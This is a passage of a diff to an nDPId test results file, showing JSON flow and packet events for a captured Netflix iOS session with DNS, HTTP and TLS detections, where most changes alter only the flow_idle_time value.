+00832{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":878,"source":"netflix.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1484319049465,"flow_last_seen":1484319049580,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4993,"flow_avg_l4_payload_len":624,"midstream":0,"thread_ts_msec":1484319049580,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53152,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"api-global.netflix.com","url":"api-global.netflix.com\/msl\/nrdjs\/2.1.2","code":0,"content_type":"","user_agent":"Argo\/900 CFNetwork\/808.2.16 Darwin\/16.3.0"}} 
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":886,"source":"netflix.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319049641,"flow_last_seen":1484319049641,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1484319049641,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51728,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":886,"source":"netflix.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1484319049641,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":80,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":80,"pkt_l4_len":46,"thread_ts_msec":1484319049641,"pkt":"gCqoTGHM5JjWH70UCABFAABCJHQAAP8RE97AqAEHwKgBAcoQADUALkrZBBoBAAABAAAAAAAABGE4MDMEZHNjZwZha2FtYWkDbmV0AAABAAE="} 00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":886,"source":"netflix.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319049641,"flow_last_seen":1484319049641,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1484319049641,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51728,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"a803.dscg.akamai.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
@@ -152,137 +152,137 @@ 00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":887,"source":"netflix.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319049645,"flow_last_seen":1484319049645,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1484319049645,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52347,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ios.nccp.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00532{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":891,"source":"netflix.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1484319049665,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":112,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":112,"pkt_l4_len":78,"thread_ts_msec":1484319049665,"pkt":"5JjWH70UgCqoTGHMCABFAABi4UdAAEAR1erAqAEBwKgBBwA1yhAATkFkBBqBgAABAAIAAAAABGE4MDMEZHNjZwZha2FtYWkDbmV0AAABAAHADAABAAEAAAAMAAS4GcwYwAwAAQABAAAADAAEuBnMKA=="} 00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":891,"source":"netflix.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319049641,"flow_last_seen":1484319049665,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":108,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1484319049665,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51728,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"a803.dscg.akamai.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"184.25.204.24"}} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":895,"source":"netflix.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319049672,"flow_last_seen":1484319049672,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319049672,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.24","src_port":53153,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":895,"source":"netflix.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1484319049672,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319049672,"pkt":"gCqoTGHM5JjWH70UCABFAABAS8NAAEAGqRPAqAEHuBnMGM+hAFBgKjK0AAAAALAC\/\/92\/gAAAgQFtAEDAwUBAQgKH2T36AAAAAAEAgAA"} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":895,"source":"netflix.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319049672,"flow_last_seen":1484319049672,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319049672,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.24","src_port":53153,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":895,"source":"netflix.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1484319049672,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319049672,"pkt":"gCqoTGHM5JjWH70UCABFAABAS8NAAEAGqRPAqAEHuBnMGM+hAFBgKjK0AAAAALAC\/\/92\/gAAAgQFtAEDAwUBAQgKH2T36AAAAAAEAgAA"} 00878{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":896,"source":"netflix.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1484319049681,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":371,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":371,"pkt_l4_len":337,"thread_ts_msec":1484319049681,"pkt":"5JjWH70UgCqoTGHMCABFAAFl4UhAAEAR1ObAqAEBwKgBBwA1zHsBUaLnX+eBgAABAAoAAAAAA2lvcwRuY2NwB25ldGZsaXgDY29tAAAcAAHADAAFAAEAAABiAA8DaW9zBG5jY3ADZ2VvwBXAMgAFAAEAAAFYABwDaW9zBG5jY3AJdXMtd2VzdC0yBnByb2RhYcAVwE0AHAABAAAAFwAQJiABCHAPAAAAAAAANChyo8BNABwAAQAAABcAECYgAQhwDwAAAAAAADQoMS\/ATQAcAAEAAAAXABAmIAEIcA8AAAAAAAA0KQT4wE0AHAABAAAAFwAQJiABCHAPAAAAAAAANCk7ncBNABwAAQAAABcAECYgAQhwDwAAAAAAADQnRIjATQAcAAEAAAAXABAmIAEIcA8AAAAAAAA0KBwAwE0AHAABAAAAFwAQJiABCHAPAAAAAAAANCh7ccBNABwAAQAAABcAECYgAQhwDwAAAAAAADQoNhw="} 00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":896,"source":"netflix.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319049645,"flow_last_seen":1484319049681,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":367,"flow_avg_l4_payload_len":183,"midstream":0,"thread_ts_msec":1484319049681,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52347,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ios.nccp.netflix.com","num_queries":1,"num_answers":10,"reply_code":0,"query_type":28,"rsp_type":28,"rsp_addr":"38.32.1.8"}} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":897,"source":"netflix.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319049684,"flow_last_seen":1484319049684,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319049684,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53162,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":897,"source":"netflix.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1484319049684,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319049684,"pkt":"gCqoTGHM5JjWH70UCABFAABAHF1AAEAGFLrAqAEHNr8RM8+qAbupwyRaAAAAALAC\/\/92fwAAAgQFtAEDAwUBAQgKH2T39AAAAAAEAgAA"} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":898,"source":"netflix.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1484319049697,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319049697,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADwG+Lq4GcwYwKgBBwBQz6GV0BcIYCoytaAScSDlwwAAAgQFtAQCCAr\/\/IQ4H2T36AEDAwU="} 
-00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":900,"source":"netflix.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1484319049700,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319049700,"pkt":"gCqoTGHM5JjWH70UCABFAAA0bmdAAEAGhnvAqAEHuBnMGM+hAFBgKjK1ldAXCYAQEBV1gAAAAQEICh9k+AH\/\/IQ4"} -00824{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":902,"source":"netflix.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319049672,"flow_last_seen":1484319049703,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1484319049703,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.24","src_port":53153,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"tp.akam.nflximg.com","url":"tp.akam.nflximg.com\/tpa3\/616\/2041779616.bif","code":0,"content_type":"","user_agent":"Argo\/900 CFNetwork\/808.2.16 Darwin\/16.3.0"}} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":908,"source":"netflix.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1484319049740,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319049740,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACoGRvs2vxEzwKgBBwG7z6pwpjzKqcMkW6ASOJCp2gAAAgQFtAQCCAqtikoKH2T39AEDAwg="} 
-00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":910,"source":"netflix.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1484319049743,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319049743,"pkt":"gCqoTGHM5JjWH70UCABFAAA0ddRAAEAGu07AqAEHNr8RM8+qAbupwyRbcKY8y4AQEBUA7QAAAQEICh9k+CqtikoK"} -00962{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":912,"source":"netflix.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319049684,"flow_last_seen":1484319049748,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1484319049748,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53162,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-00976{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":913,"source":"netflix.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319049672,"flow_last_seen":1484319049753,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1664,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1484319049753,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.24","src_port":53153,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"25": {"risk":"HTTP Suspicious Content","severity":"High","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"tp.akam.nflximg.com","url":"tp.akam.nflximg.com\/tpa3\/616\/2041779616.bif","code":200,"content_type":"text\/plain","user_agent":"Argo\/900 CFNetwork\/808.2.16 Darwin\/16.3.0"}} -01018{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":920,"source":"netflix.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319049684,"flow_last_seen":1484319049807,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1484319049807,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53162,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01358{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":923,"source":"netflix.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319049684,"flow_last_seen":1484319049850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3045,"flow_avg_l4_payload_len":435,"midstream":0,"thread_ts_msec":1484319049850,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53162,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","server_names":"*.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Primary Certificate Authority (2009), ST=California, C=US, O=Netflix Inc, OU=Electronic Delivery, L=Los Gatos","subjectDN":"CN=*.nccp.netflix.com, O=Netflix, Inc., OU=Operations, C=US, ST=California, L=Los Gatos","fingerprint":"97:F6:63:95:8F:F2:5E:E0:80:12:5A:FD:BF:B2:EB:FE:A2:FE:72:33"}} 
-00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":968,"source":"netflix.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319050652,"flow_last_seen":1484319050652,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319050652,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.145","src_port":53163,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":968,"source":"netflix.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1484319050652,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319050652,"pkt":"gCqoTGHM5JjWH70UCABFAABA2xBAAEAGenHAqAEHF\/YLkc+rAFC8XkCtAAAAALAC\/\/9pzAAAAgQFtAEDAwUBAQgKH2T7jgAAAAAEAgAA"} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":970,"source":"netflix.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1484319050677,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319050677,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWmYX9guRwKgBBwBQz6susPTdvF5ArqAS\/\/\/2WQAAAgQFtAEDAwkEAggKRVwbeB9k+44="} 
-00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":971,"source":"netflix.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1484319050678,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319050678,"pkt":"gCqoTGHM5JjWH70UCABFAAA0kSxAAEAGxGHAqAEHF\/YLkc+rAFC8XkCuLrD03oAQEBUU+gAAAQEICh9k+6dFXBt4"} -01128{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":972,"source":"netflix.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319050652,"flow_last_seen":1484319050682,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":356,"flow_tot_l4_payload_len":356,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319050682,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.145","src_port":53163,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.145","url":"23.246.11.145\/range\/0-65535?o=AQEfKq2oMrLRiWL-p-VeIZ6WKRq-X6LMvaLqgxWBCuFbh09MpreORUUOO5Tx1683HPnLY6BPjN_9mlDuYihGZoXu9u0ozH8RFioBN_JDNiRscidjvoSdWmlyZgPNansW0lkBr4X81HvloOi8BS_exVSPhMyJQTB5bg&v=3&e=1484347850&t=5xfYVtna3GdYXL71uNs6DZ-X84Y&random=3930708224","code":0,"content_type":"","user_agent":"netflix-ios-app"}} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1027,"source":"netflix.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319052216,"flow_last_seen":1484319052216,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319052216,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.10.139","src_port":53164,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1027,"source":"netflix.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1484319052216,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319052216,"pkt":"gCqoTGHM5JjWH70UCABFAABAN3hAAEAGHxDAqAEHF\/YKi8+sAFBgdy0VAAAAALAC\/\/\/UZQAAAgQFtAEDAwUBAQgKH2UBeQAAAAAEAgAA"} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1031,"source":"netflix.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1484319052235,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319052235,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGW2wX9gqLwKgBBwBQz6xlmlqWYHctFqAS\/\/8JBgAAAgQFtAEDAwkEAggKQI7bkB9lAXk="} 
-00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1032,"source":"netflix.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1484319052237,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319052237,"pkt":"gCqoTGHM5JjWH70UCABFAAA0JFZAAEAGMj7AqAEHF\/YKi8+sAFBgdy0WZZpal4AQEBUnrAAAAQEICh9lAYxAjtuQ"} -01129{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1033,"source":"netflix.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319052216,"flow_last_seen":1484319052242,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":356,"flow_tot_l4_payload_len":356,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319052242,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.10.139","src_port":53164,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.10.139","url":"23.246.10.139\/range\/0-65535?o=AQEfKq2oMrLRiWL-p-VeIZ6WKRq-X6LMvaLqgxWBCuFbh09MpreORUUOO5Tx1683HPnLY6BPjN_9mlDuYihGZoXu9u0ozH8RFioBN_JDNiRscidjvoSdWmlyZgPNansW0lkBr4X81HvloOi8BS_exVSPhMyJQTB5bg&v=3&e=1484347850&t=-djGXIcbFBNzyfugqEWcrgtCpyY&random=3407360776","code":0,"content_type":"","user_agent":"netflix-ios-app"}} 
-00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1100,"source":"netflix.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319054101,"flow_last_seen":1484319054101,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319054101,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.3.140","src_port":53171,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1100,"source":"netflix.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1484319054101,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319054101,"pkt":"gCqoTGHM5JjWH70UCABFAABA9bFAAEAGZ9XAqAEHF\/YDjM+zAFBtwXYMAAAAALAC\/\/99\/AAAAgQFtAEDAwUBAQgKH2UImQAAAAAEAgAA"} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1101,"source":"netflix.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1484319054132,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319054132,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADgGZWsX9gOMwKgBBwBQz7OFwt93bcF2DaAS\/\/\/aJAAAAgQFtAEDAwkEAggKhKDK7B9lCJk="} 
-00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1102,"source":"netflix.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1484319054134,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319054134,"pkt":"gCqoTGHM5JjWH70UCABFAAA0mQ1AAEAGxIXAqAEHF\/YDjM+zAFBtwXYNhcLfeIAQEBX4vQAAAQEICh9lCLmEoMrs"} 